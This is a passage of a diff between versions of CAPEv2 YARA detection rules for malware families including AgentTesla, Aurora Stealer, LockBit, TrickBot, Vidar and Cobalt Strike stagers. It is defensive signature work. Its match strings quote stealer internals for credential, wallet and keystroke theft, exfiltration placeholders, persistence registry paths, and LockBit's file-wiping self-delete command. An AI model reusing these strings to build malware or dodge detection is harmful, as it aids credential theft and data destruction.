"1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX" wide + $s1 = "get_kbHook" ascii + $s2 = "GetPrivateProfileString" ascii + $s3 = "get_OSFullName" ascii + $s4 = "get_PasswordHash" ascii + $s5 = "remove_Key" ascii + $s6 = "FtpWebRequest" ascii + $s7 = "logins" fullword wide + $s8 = "keylog" fullword wide + $s9 = "1.85 (Hash, version 2, native byte-order)" wide + $cl1 = "Postbox" fullword ascii + $cl2 = "BlackHawk" fullword ascii + $cl3 = "WaterFox" fullword ascii + $cl4 = "CyberFox" fullword ascii + $cl5 = "IceDragon" fullword ascii + $cl6 = "Thunderbird" fullword ascii condition: - uint16(0)==0x5A4D and ( all of ($a*)) + ( uint16(0)==0x5a4d and 6 of ($s*)) or (6 of ($s*) and 2 of ($cl*)) } -rule CAPE_Aurorastealer : FILE +rule CAPE_Agentteslav3 : FILE { meta: - description = "detects Aurora Stealer samples" - author = "Johannes Bader @viql" - id = "07779318-3e5d-5e67-8c04-f3f70d7e48b7" - date = "2022-12-14" - modified = "2023-03-31" + description = "AgentTeslaV3 infostealer payload" + author = "ditekshen" + id = "cfe00382-8663-54a4-a7c4-b932ec7ad5e3" + date = "2024-03-22" + modified = "2024-03-22" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/AuroraStealer.yar#L1-L74" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "0d10e9268184f494a73d5b4ab0d9a478ad0c26d2ef13d5134f8c9769f028b8f5" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/AgentTesla.yar#L69-L111" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "26c4fa0ce8de6982eb599f3872e8ab2a6e83da4741db7f3500c94e0a8fe5d459" score = 75 - quality = 45 + quality = 68 tags = "FILE" - version = "v1.0" - tlp = "TLP:WHITE" - malpedia_family = "win.aurora_stealer" - hash1_md5 = "51c153501e991f6ce4901e6d9578d0c8" - hash1_sha1 = "3816f17052b28603855bde3e57db77a8455bdea4" - hash1_sha256 = "c148c449e1f6c4c53a7278090453d935d1ab71c3e8b69511f98993b6057f612d" - hash2_md5 = "65692e1d5b98225dbfb1b6b2b8935689" - hash2_sha1 = "0b51765c175954c9e47c39309e020bcb0f90b783" - hash2_sha256 = "5a42aa4fc8180c7489ce54d7a43f19d49136bd15ed7decf81f6e9e638bdaee2b" - cape_type = "AuroraStealer Payload" + cape_type = "AgentTesla payload" strings: - $str_func_01 = "main.(*DATA_BLOB).ToByteArray" - $str_func_02 = "main.Base64Encode" - $str_func_03 = "main.Capture" - $str_func_04 = "main.CaptureRect" - $str_func_05 = "main.ConnectToServer" - $str_func_06 = "main.CreateImage" - $str_func_07 = "main.FileExsist" - $str_func_08 = "main.GetDisplayBounds" - $str_func_09 = "main.GetInfoUser" - $str_func_10 = "main.GetOS" - $str_func_11 = "main.Grab" - $str_func_12 = "main.MachineID" - $str_func_13 = "main.NewBlob" - $str_func_14 = "main.NumActiveDisplays" - $str_func_15 = "main.PathTrans" - $str_func_16 = "main.SendToServer_NEW" - $str_func_17 = "main.SetUsermame" - $str_func_18 = "main.Zip" - $str_func_19 = "main.base64Decode" - $str_func_20 = "main.countupMonitorCallback" - $str_func_21 = "main.enumDisplayMonitors" - $str_func_22 = "main.getCPU" - $str_func_23 = "main.getDesktopWindow" - $str_func_24 = "main.getGPU" - $str_func_25 = "main.getMasterKey" - $str_func_26 = "main.getMonitorBoundsCallback" - $str_func_27 = "main.getMonitorRealSize" - $str_func_28 = "main.sysTotalMemory" - $str_func_29 = "main.xDecrypt" - $str_type_01 = "type..eq.main.Browser_G" - $str_type_02 = "type..eq.main.STRUSER" - $str_type_03 = "type..eq.main.Telegram_G" - $str_type_04 = "type..eq.main.Crypto_G" - $str_type_05 = "type..eq.main.ScreenShot_G" - $str_type_06 = "type..eq.main.FileGrabber_G" - $str_type_07 = "type..eq.main.FTP_G" - $str_type_08 = "type..eq.main.Steam_G" - $str_type_09 = "type..eq.main.DATA_BLOB" - $str_type_10 = "type..eq.main.Grabber" - $varia_01 = "\\User Data\\Local State" - $varia_02 = "\\\\Opera Stable\\\\Local State" - $varia_03 = "Reconnect 1" - $varia_04 = "@ftmone" - $varia_05 = "^user^" - $varia_06 = "wmic path win32_VideoController get name" - $varia_07 = "\\AppData\\Roaming\\Telegram Desktop\\tdata" - $varia_08 = "C:\\Windows.old\\Users\\" - $varia_09 = "ScreenShot" - $varia_10 = "Crypto" + $s1 = "get_kbok" fullword ascii + $s2 = "get_CHoo" fullword ascii + $s3 = "set_passwordIsSet" fullword ascii + $s4 = "get_enableLog" fullword ascii + $s5 = "bot%telegramapi%" wide + $s6 = "KillTorProcess" fullword ascii + $s7 = "GetMozilla" ascii + $s8 = "torbrowser" wide + $s9 = "%chatid%" wide + $s10 = "logins" fullword wide + $s11 = "credential" fullword wide + $s12 = "AccountConfiguration+" wide + $s13 = ".+?)\\1[^>]*>" fullword wide + $s14 = "set_Lenght" fullword ascii + $s15 = "get_Keys" fullword ascii + $s16 = "set_AllowAutoRedirect" fullword ascii + $s17 = "set_wtqQe" fullword ascii + $s18 = "set_UseShellExecute" fullword ascii + $s19 = "set_IsBodyHtml" fullword ascii + $s20 = "set_FElvMn" fullword ascii + $s21 = "set_RedirectStandardOutput" fullword ascii + $g1 = "get_Clipboard" fullword ascii + $g2 = "get_Keyboard" fullword ascii + $g3 = "get_Password" fullword ascii + $g4 = "get_CtrlKeyDown" fullword ascii + $g5 = "get_ShiftKeyDown" fullword ascii + $g6 = "get_AltKeyDown" fullword ascii + $m1 = "yyyy-MM-dd hh-mm-ssCookieapplication/zipSCSC_.jpegScreenshotimage/jpeg/log.tmpKLKL_.htmlLogtext/html[]Time" ascii + $m2 = "%image/jpg:Zone.Identifier\\tmpG.tmp%urlkey%-f \\Data\\Tor\\torrcp=%PostURL%127.0.0.1POST+%2B" ascii + $m3 = ">{CTRL}Windows RDPcredentialpolicyblobrdgchrome{{{0}}}CopyToComputeHashsha512CopySystemDrive\\WScript.ShellRegReadg401" ascii + $m4 = "%startupfolder%\\%insfolder%\\%insname%/\\%insfolder%\\Software\\Microsoft\\Windows\\CurrentVersion\\Run%insregname%SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\RunTruehttp" ascii + $m5 = "\\WindowsLoad%ftphost%/%ftpuser%%ftppassword%STORLengthWriteCloseGetBytesOpera" ascii condition: - uint16(0)==0x5A4D and (32 of ($str_*) or 9 of ($varia_*)) + ( uint16(0)==0x5a4d and (8 of ($s*) or (6 of ($s*) and 4 of ($g*)))) or (2 of ($m*)) } -rule CAPE_Lockbit : FILE +rule CAPE_Agentteslaxor : FILE { meta: - description = "Lockbit Payload" + description = "AgentTesla xor-based config decoding" author = "kevoreilly" - id = "ec9b4fec-0233-5277-b922-07057c2b4b34" - date = "2022-06-09" - modified = "2022-06-09" + id = "81eeb62f-578f-5c75-bc96-091d5727a20a" + date = "2024-03-22" + modified = "2024-03-22" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Lockbit.yar#L1-L15" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "80ab705c8246a0bd5b3de65146cf32b102f39bf9444bdf1d366b5a794c1229b9" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/AgentTesla.yar#L113-L123" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "54581e83e5fa13fae4bda74016b3fa1d18c92e2659f493ebe54d70fd5f77bba5" score = 75 - quality = 70 + quality = 20 tags = "FILE" - cape_type = "Lockbit Payload" + cape_type = "AgentTesla Payload" strings: - $string1 = "/C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 \"%s\" & Del /f /q \"%s\"" wide - $string2 = "Ransom" ascii wide - $crypto = {8B 4D 08 C1 E9 10 0F B6 D1 8B 4D 0C C1 E9 08 0F B6 C9 8B 14 95 [4] 8B 7D FC 33 14 8D [4] 8B CF C1 E9 18 33 14 8D [4] 0F B6 CB 33 14 8D [4] 8B CF 33 10} - $decode1 = {8A ?4 34 ?C 0? 00 00 8B 8? 24 ?8 0? 00 00 0F BE ?? 0F BE C? 33 ?? 88 ?? 34 ?? 0? 00 00 46 83 FE 0? 72 DD} - $decode2 = {8A 44 24 ?? 30 44 0C ?? 41 83 F9 ?? 72 F2} + $decode = {06 91 06 61 20 [4] 61 D2 9C 06 17 58 0A 06 7E [4] 8E 69 FE 04 2D ?? 2A} condition: - uint16(0)==0x5A4D and (2 of them ) + uint16(0)==0x5A4D and any of them } -rule CAPE_Magniber : FILE +rule CAPE_Agentteslav4 : FILE { meta: - description = "Magniber Payload" + description = "AgentTesla Payload" author = "kevoreilly" - id = "a704914f-2aa2-537d-975d-f8c23427951f" - date = "2019-10-30" - modified = "2019-10-30" + id = "a39109ca-84cb-527d-b9c2-d8763fa6e496" + date = "2024-03-22" + modified = "2024-03-22" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Magniber.yar#L1-L11" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "1875754bdf98c1886f31f6c6e29992a98180f74d8fa168ae391e2c660d760618" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/AgentTesla.yar#L125-L138" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "0a39036f408728ab312a54ff3354453d171424f57f9a8f3b42af867be3037ca9" score = 75 quality = 70 tags = "FILE" - cape_type = "Magniber Payload" + cape_type = "AgentTesla Payload" + packed = "7f8a95173e17256698324886bb138b7936b9e8c5b9ab8fffbfe01080f02f286c" strings: - $a1 = {8B 55 FC 83 C2 01 89 55 FC 8B 45 FC 3B 45 08 7D 45 6A 01 6A 00 E8 26 FF FF FF 83 C4 08 89 45 F4 83 7D F4 00 75 18 6A 7A 6A 61 E8 11 FF FF FF 83 C4 08 8B 4D FC 8B 55 F8 66 89 04 4A EB 16} + $decode1 = {(07|FE 0C 01 00) (07|FE 0C 01 00) 8E 69 (17|20 01 00 00 00) 63 8F ?? 00 00 01 25 47 (06|FE 0C 00 00) (1A|20 04 00 00 00) 58 4A D2 61 D2 52} + $decode2 = {(07|FE 0C 01 00) (08|FE 0C 02 00) 8F ?? 00 00 01 25 47 (07|FE 0C 01 00) (11 07|FE 0C 07 00) 91 (06|FE 0C 00 00) (1A|20 04 00 00 00) 58 4A 61 D2 61 D2 52} + $decode3 = {(07|FE 0C 01 00) (11 07|FE 0C 07 00) 8F ?? 00 00 01 25 47 (07|FE 0C 01 00) (08|FE 0C 02 00) 91 61 D2 52} condition: - uint16(0)==0x5A4D and ( all of ($a*)) + uint16(0)==0x5A4D and all of them } -rule CAPE_Ramnit : FILE +rule CAPE_Scarab : FILE { meta: - description = "Ramnit Payload" + description = "Scarab Payload" author = "kevoreilly" - id = "6df92055-05f6-5985-9268-b9c85e143567" + id = "2ba8ae50-1e56-5773-aaea-058161b59c78" date = "2019-10-30" modified = "2019-10-30" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Ramnit.yar#L1-L13" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "6f661f47bdf8377b0fb96f190fcb964c0ed2b43ce7ae7880f9dfce9e43837efd" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Scarab.yar#L1-L13" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "0d8fa7ab4c8e5699f17f9e9444e85a42563a840a8e7ee9eda54add3a6845d1c6" score = 75 quality = 70 tags = "FILE" - cape_type = "Ramnit Payload" + cape_type = "Scarab Payload" strings: - $DGA = {33 D2 B9 1D F3 01 00 F7 F1 8B C8 B8 A7 41 00 00 F7 E2 8B D1 8B C8 B8 14 0B 00 00 F7 E2 2B C8 33 D2 8B C1 8B} - $xor_loop = {83 7D 0C 00 74 27 83 7D 14 00 74 21 8B 4D 0C 8B 7D 08 8B 75 10 BA 00 00 00 00 0B D2 75 04 8B 55 14 4A 8A 1C 32 32 1F 88 1F 47 4A E2 ED} - $id_string = "{%08X-%04X-%04X-%04X-%08X%04X}" + $crypt1 = {8B D8 32 1A 0F B6 DB 8B 1C 9F C1 E8 08 33 D8 8B C3 42 8B D8 32 1A 0F B6 DB 8B 1C 9F C1 E8 08 33 D8 8B C3 42 8B D8 32 1A 0F B6 DB 8B 1C 9F C1 E8 08} + $crypt2 = {8B 4C 82 0C 8B D9 C1 E3 18 C1 E9 08 0B D9 8B CB 0F B6 D9 8B 1C 9D AC 0C 43 00 89 5C 24 04 8B D9 C1 EB 08 0F B6 DB 8B 34 9D AC 0C 43 00 8B D9 C1 EB 10} + $crypt3 = {8B 13 8B CA 81 E1 80 80 80 80 8B C1 C1 E8 07 50 8B C1 59 2B C1 25 1B 1B 1B 1B 8B CA 81 E1 7F 7F 7F 7F 03 C9 33 C1 8B C8 81 E1 80 80 80 80 8B F1 C1 EE 07} condition: - uint16(0)==0x5A4D and all of ($*) + uint16(0)==0x5A4D and all of them } -rule CAPE_Cobaltstrikestager +rule CAPE_Trickbot { meta: - description = "Cobalt Strike Stager Payload" - author = "@dan__mayer " - id = "eedf71b1-9f27-5a6f-afe8-3ddae47f9a06" - date = "2023-01-18" - modified = "2023-01-18" + description = "TrickBot Payload" + author = "sysopfb & kevoreilly" + id = "dc88eadd-7b84-5bd0-96d1-aad480632bee" + date = "2023-02-07" + modified = "2023-02-07" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/CobaltStrikeStager.yar#L1-L15" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "6a55b0c3ab5f557dfb7a3f8bd616ede1bd9b93198590fc9d52aa19c1154388c5" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/TrickBot.yar#L1-L20" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "47cc2070b43957601a72745329a9d14fb3fbfd4d2b31cacc35d4ac750dde31ea" score = 75 quality = 70 tags = "" - cape_type = "CobaltStrikeStager Payload" + cape_type = "TrickBot Payload" strings: - $smb = { 68 00 B0 04 00 68 00 B0 04 00 6A 01 6A 06 6A 03 52 68 45 70 DF D4 } - $http_x86 = { 68 6E 65 74 00 68 77 69 6E 69 54 68 4C 77 26 07 } - $http_x64 = { 49 BE 77 69 6E 69 6E 65 74 00 41 56 49 89 E6 4C 89 F1 41 BA 4C 77 26 07 } - $dns = { 68 00 10 00 00 68 FF FF 07 00 6A 00 68 58 A4 53 E5 } + $str1 = "*" ascii wide + $str2 = "group_tag" ascii wide + $str3 = "client_id" ascii wide + $code1 = {8A 11 88 54 35 F8 46 41 4F 89 4D F0 83 FE 04 0F 85 7E 00 00 00 8A 1D ?? ?? ?? ?? 33 F6 8D 49 00 33 C9 84 DB 74 1F 8A 54 35 F8 8A C3 8D 64 24 00} + $code2 = {8B 4D FC 8A D1 02 D2 8A C5 C0 F8 04 02 D2 24 03 02 C2 88 45 08 8A 45 FE 8A D0 C0 FA 02 8A CD C0 E1 04 80 E2 0F 32 D1 8B 4D F8 C0 E0 06 02 45 FF 88 55 09 66 8B 55 08 66 89 11 88 41 02} + $code3 = {0F B6 54 24 49 0F B6 44 24 48 48 83 C6 03 C0 E0 02 0F B6 CA C0 E2 04 C0 F9 04 33 DB 80 E1 03 02 C8 88 4C 24 40 0F B6 4C 24 4A 0F B6 C1 C0 E1 06 02 4C 24 4B C0 F8 02 88 4C 24 42 24 0F} + $code4 = {53 8B 5C 24 18 55 8B 6C 24 10 56 8B 74 24 18 8D 9B 00 00 00 00 8B C1 33 D2 F7 F3 41 8A 04 2A 30 44 31 FF 3B CF 75 EE 5E 5D 5B 5F C3} + $code5 = {50 0F 31 C7 44 24 04 01 00 00 00 8D 0C C5 00 00 00 00 F7 C1 F8 07 00 00 74 1B 48 C1 E2 20 48 8B C8 48 0B CA 0F B6 C9 C1 E1 03 F7 D9 C1 64 24 04 10 FF C1 75 F7 59 C3} + $code6 = {53 8B 5C 24 0C 56 8B 74 24 14 B8 ?? ?? ?? ?? F7 E9 C1 FA 02 8B C2 C1 E8 1F 03 C2 6B C0 16 8B D1 2B D0 8A 04 1A 30 04 31 41 3B CF 75 DD 5E 5B 5F C3} + $code7 = {B8 ?? ?? 00 00 85 C9 74 32 BE ?? ?? ?? ?? BA ?? ?? ?? ?? BF ?? ?? ?? ?? BB ?? ?? ?? ?? 03 F2 8B 2B 83 C3 04 33 2F 83 C7 04 89 29 83 C1 04 3B DE 0F 43 DA} condition: - any of them + all of ($str*) or any of ($code*) } -rule CAPE_Bumblebee : FILE +rule CAPE_Trickbot_Permadll_UEFI_Module { meta: - description = "BumbleBee Payload" - author = "enzo & kevoreilly" - id = "b3a4dd53-014c-5e16-8ac1-7f3800ae017d" - date = "2023-10-02" - modified = "2023-10-02" + description = "Detects TrickBot Banking module permaDll" + author = "@VK_Intel | Advanced Intelligence" + id = "ba104164-0a1a-5a4c-8312-7653f7818e96" + date = "2023-02-07" + modified = "2023-02-07" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/BumbleBee.yar#L35-L50" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "bc7c2ce9d3cd598c9510dc64d78048999f2f89ee5a84cd0d6046dbdfabe260ee" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/TrickBot.yar#L22-L38" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + hash = "491115422a6b94dc952982e6914adc39" + logic_hash = "564055f56fd19bed8900e6d451ba050b4e9013a9208a3bdc3d3d563567d225d2" score = 75 quality = 70 - tags = "FILE" - cape_type = "BumbleBee Payload" + tags = "" strings: - $antivm1 = {84 C0 74 09 33 C9 FF [4] 00 CC 33 C9 E8 [3] 00 4? 8B C8 E8} - $antivm2 = {84 C0 0F 85 [2] 00 00 33 C9 E8 [4] 48 8B C8 E8 [4] 48 8D 85} - $antivm3 = {33 C9 E8 [4] 48 8B C8 E8 [4] 83 CA FF 48 8B 0D [4] FF 15} - $antivm4 = {33 C9 E8 [4] 48 8B C8 E8 [4] 90 48 8B 05 [4] 48 85 C0 74} - $str_ua = "bumblebee" - $str_gate = "/gate" + $module_cfg = "moduleconfig" + $str_imp_01 = "Start" + $str_imp_02 = "Control" + $str_imp_03 = "FreeBuffer" + $str_imp_04 = "Release" + $module = "user_platform_check.dll" + $intro_routine = { 83 ec 40 8b ?? ?? ?? 53 8b ?? ?? ?? 55 33 ed a3 ?? ?? ?? ?? 8b ?? ?? ?? 56 57 89 ?? ?? ?? a3 ?? ?? ?? ?? 39 ?? ?? ?? ?? ?? 75 ?? 8d ?? ?? ?? 89 ?? ?? ?? 50 6a 40 8d ?? ?? ?? ?? ?? 55 e8 ?? ?? ?? ?? 85 c0 78 ?? 8b ?? ?? ?? 85 ff 74 ?? 47 57 e8 ?? ?? ?? ?? 8b f0 59 85 f6 74 ?? 57 6a 00 56 e8 ?? ?? ?? ?? 83 c4 0c eb ??} condition: - uint16(0)==0x5A4D and ( any of ($antivm*) or all of ($str_*)) + 6 of them } -rule CAPE_Locky : FILE +rule CAPE_Vidar : FILE { meta: - description = "Locky Payload" - author = "kevoreilly" - id = "664d0365-af49-5222-a4ed-9260332f6940" - date = "2022-06-09" - modified = "2022-06-09" + description = "Vidar Payload" + author = "kevoreilly,rony" + id = "9e4e797f-880e-54eb-ad44-caad0ec5683c" + date = "2023-04-21" + modified = "2023-04-21" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Locky.yar#L1-L14" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "9786c54a2644d9581fefe64be11b26e22806398e54e961fa4f19d26eae039cd7" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Vidar.yar#L1-L22" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "5d4c030536ed41cf4e0dcb77b2fe4553d789ee2b8095a4b3e050692335a8709d" score = 75 quality = 70 tags = "FILE" - cape_type = "Locky Payload" + cape_type = "Vidar Payload" + packed = "0cff8404e73906f3a4932e145bf57fae7a0e66a7d7952416161a5d9bb9752fd8" strings: - $string1 = "wallet.dat" wide - $string2 = "Locky_recover" wide - $string3 = "opt321" wide + $decode = {FF 75 0C 8D 34 1F FF 15 ?? ?? ?? ?? 8B C8 33 D2 8B C7 F7 F1 8B 45 0C 8B 4D 08 8A 04 02 32 04 31 47 88 06 3B 7D 10 72 D8} + $xor_dec = {0F B6 [0-5] C1 E? ?? 33 ?? 81 E? [0-5] 89 ?? 7C AF 06} + $wallet = "*wallet*.dat" fullword ascii wide + $s1 = "\"os_crypt\":{\"encrypted_key\":\"" fullword ascii wide + $s2 = "screenshot.jpg" fullword ascii wide + $s3 = "\\Local State" fullword ascii wide + $s4 = "Content-Disposition: form-data; name=\"" fullword ascii wide + $s5 = "CC\\%s_%s.txt" fullword ascii wide + $s6 = "History\\%s_%s.txt" fullword ascii wide + $s7 = "Autofill\\%s_%s.txt" fullword ascii wide + $s8 = "Downloads\\%s_%s.txt" fullword ascii wide condition: - uint16(0)==0x5A4D and all of them + uint16be(0)==0x4d5a and 6 of them } -rule CAPE_Doomedloader : FILE +rule CAPE_Magniber : FILE { meta: - description = "No description has been set in the source file - CAPE" + description = "Magniber Payload" author = "kevoreilly" - id = "88436e71-360e-5719-989f-24e71591ebe0" - date = "2024-05-09" - modified = "2024-05-09" + id = "a704914f-2aa2-537d-975d-f8c23427951f" + date = "2019-10-30" + modified = "2019-10-30" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/DoomedLoader.yar#L1-L12" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "54a5962ef49ebf987908c4ea1559788f7c96a7e4ea61d2973636e998a0239c77" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Magniber.yar#L1-L11" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "1875754bdf98c1886f31f6c6e29992a98180f74d8fa168ae391e2c660d760618" score = 75 quality = 70 tags = "FILE" - cape_type = "DoomedLoader Payload" - packed = "914b1b3180e7ec1980d0bafe6fa36daade752bb26aec572399d2f59436eaa635" + cape_type = "Magniber Payload" strings: - $anti = {48 8B 4C 24 ?? E8 [4] 84 C0 B8 [4] 41 0F 45 C6 EB} - $syscall = {49 89 CA 8B 44 24 08 FF 64 24 10} + $a1 = {8B 55 FC 83 C2 01 89 55 FC 8B 45 FC 3B 45 08 7D 45 6A 01 6A 00 E8 26 FF FF FF 83 C4 08 89 45 F4 83 7D F4 00 75 18 6A 7A 6A 61 E8 11 FF FF FF 83 C4 08 8B 4D FC 8B 55 F8 66 89 04 4A EB 16} condition: - uint16(0)==0x5A4D and all of them + uint16(0)==0x5A4D and ( all of ($a*)) } -rule CAPE_Hancitor : FILE +rule CAPE_Cobaltstrikestager { meta: - description = "Hancitor Payload" - author = "threathive" - id = "b4e9a26a-db00-5553-acc2-f35148b0ffd5" - date = "2020-10-20" - modified = "2020-10-20" + description = "Cobalt Strike Stager Payload" + author = "@dan__mayer " + id = "eedf71b1-9f27-5a6f-afe8-3ddae47f9a06" + date = "2023-01-18" + modified = "2023-01-18" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Hancitor.yar#L1-L14" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "84003542a2f587b5fbd43731c4240759806f8ee46df2bd96aae4a3c09d97e41c" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/CobaltStrikeStager.yar#L1-L15" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "6a55b0c3ab5f557dfb7a3f8bd616ede1bd9b93198590fc9d52aa19c1154388c5" score = 75 quality = 70 - tags = "FILE" - cape_type = "Hancitor Payload" + tags = "" + cape_type = "CobaltStrikeStager Payload" strings: - $fmt_string = "GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)" - $fmt_string2 = "GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x32)" - $ipfy = "http://api.ipify.org" - $user_agent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko" + $smb = { 68 00 B0 04 00 68 00 B0 04 00 6A 01 6A 06 6A 03 52 68 45 70 DF D4 } + $http_x86 = { 68 6E 65 74 00 68 77 69 6E 69 54 68 4C 77 26 07 } + $http_x64 = { 49 BE 77 69 6E 69 6E 65 74 00 41 56 49 89 E6 4C 89 F1 41 BA 4C 77 26 07 } + $dns = { 68 00 10 00 00 68 FF FF 07 00 6A 00 68 58 A4 53 E5 } condition: - uint16(0)==0x5A4D and all of them + any of them } -rule CAPE_Cerber : FILE +rule CAPE_Doppelpaymer : FILE { meta: - description = "Cerber Payload" + description = "DoppelPaymer Payload" author = "kevoreilly" - id = "edf08795-cf54-5822-8bc4-35cfba0fe8e8" - date = "2022-06-09" - modified = "2022-06-09" + id = "c8178906-1722-5908-9ad4-7ee1eef39138" + date = "2022-06-27" + modified = "2022-06-27" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Cerber.yar#L1-L12" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "16a8f808c28d3b142c079a305aba7f553f2452e439710bf610a06f8f2924d5a3" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/DoppelPaymer.yar#L1-L13" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "73a2575671bafc31a70af3ce072d6f94ae172b12202baebba586a02524cb6f9d" score = 75 quality = 70 tags = "FILE" - cape_type = "Cerber Payload" + cape_type = "DoppelPaymer Payload" strings: - $code1 = {33 C0 66 89 45 8? 8D 7D 8? AB AB AB AB AB [0-2] 66 AB 8D 45 8? [0-3] E8 ?? ?? 00 00} + $getproc32 = {81 FB ?? ?? ?? ?? 74 2D 8B CB E8 ?? ?? ?? ?? 85 C0 74 0C 8B C8 8B D7 E8 ?? ?? ?? ?? 5B 5F C3} + $cmd_string = "Setup run\\n" wide condition: uint16(0)==0x5A4D and all of them } -rule CAPE_Tscookie : FILE +rule CAPE_Carbanak : FILE { meta: - description = "TSCookie Payload" - author = "kevoreilly" - id = "e1efd356-7170-5454-bf40-68927c71816c" - date = "2019-10-30" - modified = "2019-10-30" + description = "Carnbanak Payload" + author = "enzok" + id = 